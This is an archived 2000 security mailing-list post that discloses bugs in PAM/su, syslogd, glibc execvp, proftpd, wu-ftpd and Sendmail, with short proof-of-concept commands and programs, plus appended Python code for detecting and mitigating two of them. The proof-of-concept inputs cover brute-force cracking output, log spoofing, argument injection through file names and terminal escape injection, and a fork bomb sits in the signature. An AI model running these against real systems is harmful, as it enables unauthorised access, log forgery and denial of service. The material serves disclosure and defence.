Vulnerability Development mailing list archives
bruterh.sh & syslogd & [g]libc & proftpd & wu-ftpd & sendmail
From: lcamtuf () AGS PL (Michal Zalewski)
Date: Sun, 23 Jan 2000 13:47:39 +0100
This post describes / demonstrates bugs in:

- Linux-PAM implementation (password cracking)
- syslogd daemon (spoofing)
- glibc execvp() function (undesirable behaviour)
- proftpd (SEGV)
- wu-ftpd (passing arbitrary parameters to three external programs)
- Sendmail (junk characters in queue)

No reason to panic.

===================
1. PAM/su on RedHat
===================

Known? Dunno. But works.

RedHat - NothingInLogs[tm] BruteForce(R) Password Crack
-------------------------------------------------------
- (c) 1999/2000, Michal Zalewski <lcamtuf () ids pl> -

[+] Configured against user 'testy', wordfile: words
[+] Kill-delay set to 300000 usecs...
[+] Destination account is alive and well...
[+] /bin/su seems to be executable and setuid, hopefully it works...
[+] Let's go straight to number one...
[+] Wordfile 'words' loaded - 4 passwords...
[+] Estimated time: 0 secs, max: 1 secs.
[?] Trying 'testy' (3/4)...
[*] Huh, it worked. I've tried password 'testy' for 'testy'.
[+] Time wasted: 0 seconds.
[+] Thank You, and hope you enjoyed your stay.

=====================
2. syslogd / syslog()
=====================

Unix syslogd gets 'raw' log entries from the o+w /dev/log socket, while date, priority and so on are added by the user-end library function, syslog(). Very, very clever. Get the command-line socket connectivity tool at http://lcamtuf.hack.pl/pliki/uc.c, then try:

bash$ echo -ne 'XXX YY AA:BB:CC kernel - hax0red\0' | uc /dev/log
(ctrl+c)

Well-known? Hope so; anyway, it's time to think about getpeeruid() or to change the permissions on the syslog socket.

=======================
3. glibc - execvp() bug
=======================

glibc 2.0.x (dunno about other versions?) execvp() is buggy - first, it tries execve() on the given program in the directories specified in PATH, but then, if it gets ENOEXEC (executable format error), it tries to treat it just like a shell script, calling /bin/sh -c filename. Might result in strange/undesirable behaviour:

$ cat >'-c' <<EOF
anything
EOF
$ chmod 755 -- -c
$ cat >nic.c <<EOF
#include <unistd.h>

int main(void)
{
    /* execlp() looks "-c" up in PATH; the empty PATH entry added below means the
       current directory. argv[0] is "call_me_jane", argv[1] is "id". */
    execlp("-c", "call_me_jane", "id", (char *)0);
    return 1;   /* only reached if the exec fails */
}
EOF
$ gcc nic.c
$ PATH=$PATH::
$ ./a.out
uid=500(lcamtuf) gid=500(lcamtuf) groups=500(lcamtuf),2(daemon),80(network)

=====================
4. proftpd / mod_ls.c
=====================

Due to a missing * in modules/mod_ls.c around line 760, the pointer to another pointer is incremented instead of the referenced pointer. Result: SEGV. Seems not to be exploitable, as this pointer to pointer is passed as the first parameter of the _parse_options function, while the second parameter to this function is hard-coded 0x80, and all we have is a read fault when isblank(*0x80) is called. Aaah, example? Quote 'LIST  X' (note: it is 'LIST(space)(space)X') while talking to the ftpd daemon on the remote side.

=======================
5. wu-ftpd popen() bugs
=======================

[lcamtuf@www lcamtuf]$ ftp localhost
Connected to localhost.
220 www.XXXXX.pl FTP server (lcamtuf) ready.
Name (localhost:lcamtuf): lcamtuf
331 Password required for lcamtuf.
Password:
230 User lcamtuf logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put "smyk" "--help"
local: smyk remote: --help
200 PORT command successful.
150 Opening BINARY mode data connection for --help.
226 Transfer complete.
321 bytes sent in 0.000243 secs (1.3e+03 Kbytes/sec)
ftp> quote site checksum "--help"
200 Usage: /bin/md5sum [OPTION] [FILE]...
ftp> ls "--version"
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
ls (GNU fileutils) 3.16
226 Transfer complete.

..unfortunately, neither /bin/md5sum, /bin/cksum nor /bin/ls has any interesting options (like 'use external program X' or 'dump output to file X'), and I can't see any overflows/bugs in them. Btw. 'quote site checksum existing_file' on RedHat machines causes the ftpd daemon to hang, because there's no md5sum/cksum in /bin (but in /usr/bin instead).

6. Sendmail and non-ascii characters in queue.

Simply, try it:

-- queue_boo.c --
#include <stdio.h>
#include <unistd.h>

int main(void)
{
    printf("Type '.', then 'mailq' (works with TERM=linux).\n");
    fflush(stdout);   /* make sure the hint is out before the exec replaces us */
    /* DeliveryMode=d (deferred) leaves the message sitting in the queue; the
       recipient address carries terminal escapes that mailq then prints verbatim. */
    execl("/usr/sbin/sendmail", "sendmail", "-O", "DeliveryMode=d",
          "lp(\033[2J\033[0H\033[1m* 0WNED BOX *\033[0;30m)", (char *)0);
    return 1;   /* only reached if the exec fails */
}
-- EOF --

Stupid.

_______________________________________________________________________
Michal Zalewski * [lcamtuf () ags pl] <> [AGS WAN] * [dione.ids.pl SYSADM]
[Marchew Industries] ! [http://lcamtuf.na.export.pl]   bash$ :(){ :|:&};:
[voice phone: +48 22 813 25 86] <=-=> [cellular phone: +48 603 110 160]
To iterate is human, to recurse divine. [P. Deutsch]

APPLICATION/X-SH attachment: stored
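The getpeeruid() idea from section 2, as an added example that is not part of the original post: a Linux receiver that enables SO_PASSCRED so every datagram arrives with the kernel's own record of the sending pid/uid, plus a check that flags the post's 'kernel'-tagged line as forged (the kernel never writes to /dev/log; its messages reach syslogd through klogd). The private socket path, the constructed datagram and the helper names are assumptions of mine.

```python
import os
import socket
import struct
import tempfile

# struct ucred on Linux: pid_t pid, uid_t uid, gid_t gid, three native ints.
UCRED_FMT = "3i"
UCRED_LEN = struct.calcsize(UCRED_FMT)

# Constructed datagram in the shape of the post's spoofed line: a user process,
# not the kernel, wrote it, but syslogd sees only the text.
SPOOFED = b"XXX YY AA:BB:CC kernel - hax0red"

def recv_with_creds(srv):
    """Receive one datagram plus the kernel-supplied (pid, uid, gid) of its sender."""
    data, ancdata, _flags, _addr = srv.recvmsg(4096, socket.CMSG_SPACE(UCRED_LEN))
    creds = None
    for level, ctype, cdata in ancdata:
        if level == socket.SOL_SOCKET and ctype == socket.SCM_CREDENTIALS:
            creds = struct.unpack(UCRED_FMT, cdata[:UCRED_LEN])
    return data, creds

def claims_kernel(msg):
    """True if the tag field says 'kernel'. The kernel never writes to /dev/log (its
    messages reach syslogd via klogd), so that tag on this socket is always forged."""
    fields = msg.split()
    return len(fields) > 3 and fields[3] == b"kernel"

def spoof_demo():
    """Bind a private log socket with SO_PASSCRED, send SPOOFED to it from this
    process, and report who the kernel says actually wrote it (Linux only)."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "log")
        srv = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_PASSCRED, 1)
        srv.bind(path)
        cli = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
        cli.sendto(SPOOFED, path)
        data, (pid, uid, _gid) = recv_with_creds(srv)
        cli.close()
        srv.close()
    return {
        "forged_kernel_tag": claims_kernel(data),
        "sender_is_this_process": pid == os.getpid() and uid == os.getuid(),
        "sender_uid": uid,
    }

if __name__ == "__main__":
    print(spoof_demo())
```

A real daemon would log the pid/uid next to the text (as rsyslog and journald do) instead of trusting the tag the client chose.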
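For section 6, an added example (not from the post) showing the defender's side: detect and neutralise terminal escape sequences before queue or log text is written to a terminal, exercised on a constructed address shaped like the queue_boo.c argument. The function names and regexes are my own.

```python
import re

# Constructed recipient address in the shape of the post's queue_boo.c argument:
# CSI "clear screen", "cursor home", "bold", the fake banner, then "dim black".
BOOBY_TRAPPED = "lp(\x1b[2J\x1b[0H\x1b[1m* 0WNED BOX *\x1b[0;30m)"

# ECMA-48 control sequences: ESC [ params intermediates final, and two-byte ESC Fe.
CSI_RE = re.compile(r"\x1b\[[0-?]*[ -/]*[@-~]")
ESC_RE = re.compile(r"\x1b[@-Z\\-_]")

def has_terminal_escapes(s):
    """Detection: does the string carry ESC sequences or any other C0/C1 control bytes?"""
    return bool(CSI_RE.search(s) or ESC_RE.search(s)
                or any(ord(c) < 0x20 or 0x7f <= ord(c) < 0xa0 for c in s))

def sanitize_for_terminal(s):
    """Mitigation: render control bytes visibly in caret notation so nothing that
    mailq, a mail client or a log viewer prints can drive the terminal.
    Tabs and newlines are rendered too, which is what a one-line queue listing wants."""
    out = []
    for c in s:
        o = ord(c)
        if o < 0x20:
            out.append("^" + chr(o + 0x40))   # ESC -> ^[, NUL -> ^@, TAB -> ^I
        elif o == 0x7f:
            out.append("^?")
        elif 0x80 <= o < 0xa0:
            out.append("\\x%02x" % o)          # C1 controls, shown as hex
        else:
            out.append(c)
    return "".join(out)

if __name__ == "__main__":
    print(has_terminal_escapes(BOOBY_TRAPPED), sanitize_for_terminal(BOOBY_TRAPPED))
```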